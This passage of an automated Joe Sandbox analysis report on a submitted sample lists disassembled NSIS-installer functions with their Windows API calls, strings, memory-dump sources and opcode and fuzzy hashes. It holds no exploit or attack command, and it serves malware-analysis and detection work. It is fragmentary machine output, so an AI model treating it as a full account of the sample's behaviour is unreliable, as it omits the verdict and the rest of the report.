                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                                    • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                                    • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                                    • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                    • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                                    Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                                    • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                                    Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                                    • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                    • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                                    Function 00406113 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 72filestringCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                                    • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                    • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                                    • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                    • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                                    Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                                    • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                                    • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                    • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                                    Function 004023F0 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 83libraryCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042777E,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    • `G, xrefs: 0040246E
                                                                                                                                                                                                                                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                                                                                                                                                                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                                                                                                                                                                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                                                                                                                                                                                                                                    • API String ID: 1033533793-4193110038
                                                                                                                                                                                                                                                                                                    • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                    • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                                                                                                                                                                                                                                    Function 00403DF6 Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 00403E57
                                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00403E81
                                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2081235993.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081214457.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081260200.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081284153.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2081396556.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_trZG6pItZj.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2320649405-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                    • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                                                                                                                                                                                                                                    Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,0042777E,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,0042777E,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
